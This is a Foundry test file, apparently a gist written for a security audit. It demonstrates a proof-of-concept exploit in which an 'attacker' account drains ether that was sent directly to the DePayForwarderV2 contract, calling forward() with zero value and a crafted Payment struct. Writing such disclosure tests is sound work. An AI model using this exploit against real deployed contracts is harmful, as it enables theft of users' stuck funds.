
@Falilah
Created September 3, 2023 16:25
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console} from 'forge-std/Test.sol';
import {DePayForwarderV2} from '../contracts/DePayForwarderV2.sol';
import {DePayRouterV2} from '../contracts/DePayRouterV2.sol';
import {IDePayRouterV2} from '../contracts/interfaces/IDePayRouterV2.sol';
contract DePayRouterV2Test is Test {
// Forwarder under test; a fresh instance is deployed in setUp().
DePayForwarderV2 public forwarder;
// Router deployed in setUp() with the forwarder's address as its second constructor argument.
DePayRouterV2 public router;
/// @notice Deploys a fresh forwarder and a router wired to it for the tests in this contract.
function setUp() public {
    // The forwarder is created first because the router constructor takes its address.
    DePayForwarderV2 freshForwarder = new DePayForwarderV2();
    forwarder = freshForwarder;
    // First constructor argument is address(0); the second is the forwarder's address.
    router = new DePayRouterV2(address(0), address(freshForwarder));
}
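/// @notice Proof of concept: ether sent directly to the forwarder (outside any payment) is
///         paid out to an unrelated caller of forward() who attaches no value.
/// @dev The original version only logged balances, so it passed whether or not the issue
///      was present. The assertions below pin the outcome the PoC claims. Once the forwarder
///      is fixed, this test is expected to fail and should be turned into a regression test
///      (for example, by expecting the zero-value forward() call to revert).
function testDirectEtherSent() public {
    uint forwarderBalanceBefore = address(forwarder).balance;

    // Impersonate a random user who sends ether to the forwarder outside any payment flow.
    address randomUser = makeAddr('randomUser');
    vm.startPrank(randomUser);
    vm.deal(randomUser, 5 ether);
    // 5 ether is sent directly to the forwarder. The status of the low-level call is checked
    // so that a rejected transfer fails the test here instead of going unnoticed.
    (bool sent, ) = payable(forwarder).call{value: 5 ether}('');
    assertTrue(sent, 'direct ether transfer to forwarder failed');
    vm.stopPrank();

    console.log('forwarder balance before and after ether is sent directly');
    console.log(forwarderBalanceBefore, address(forwarder).balance);
    assertEq(
        address(forwarder).balance,
        forwarderBalanceBefore + 5 ether,
        'forwarder should hold the directly sent ether'
    );

    // A second, unrelated account that will claim the funds left in the forwarder.
    address attacker = makeAddr('attacker');
    uint attackerBalanceBefore = attacker.balance;

    address NATIVE = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE;
    uint paymentAmount = 5 ether;
    uint feeAmount = 0;
    uint amountIn = paymentAmount + feeAmount;
    address feeReceiver = makeAddr('feeReceiver');

    // Payment struct built positionally: the payment receiver is set to the attacker and the
    // receiver type to 2. Field order is defined in IDePayRouterV2.Payment, which is not
    // visible here; confirm the positions against the interface.
    IDePayRouterV2.Payment memory payment2 = IDePayRouterV2.Payment(
        amountIn,
        false,
        paymentAmount,
        feeAmount,
        NATIVE,
        address(0),
        NATIVE,
        attacker,
        feeReceiver,
        0,
        2,
        '',
        // NOTE(review): this is the 9-character ASCII string, not hex-decoded bytes; use a
        // hex'...' literal if raw bytes were intended.
        '0x4589000',
        block.timestamp + 7 days
    );

    // The attacker calls forward() with msg.value == 0, so any ether paid out comes from the
    // forwarder's existing balance rather than from this call.
    vm.prank(attacker);
    forwarder.forward{value: 0 ether}(payment2);

    console.log('attacker balance before and after the withdrawal');
    console.log(attackerBalanceBefore, attacker.balance);
    console.log('forwarder new balance after the attacker withdrew the stuck ether');
    console.log(address(forwarder).balance);

    // Pin the claimed impact: the attacker gains exactly the stuck amount and the forwarder is
    // drained back to its starting balance.
    assertEq(
        attacker.balance,
        attackerBalanceBefore + paymentAmount,
        'attacker should have received the stuck ether'
    );
    assertEq(
        address(forwarder).balance,
        forwarderBalanceBefore,
        'forwarder should be back at its initial balance'
    );
}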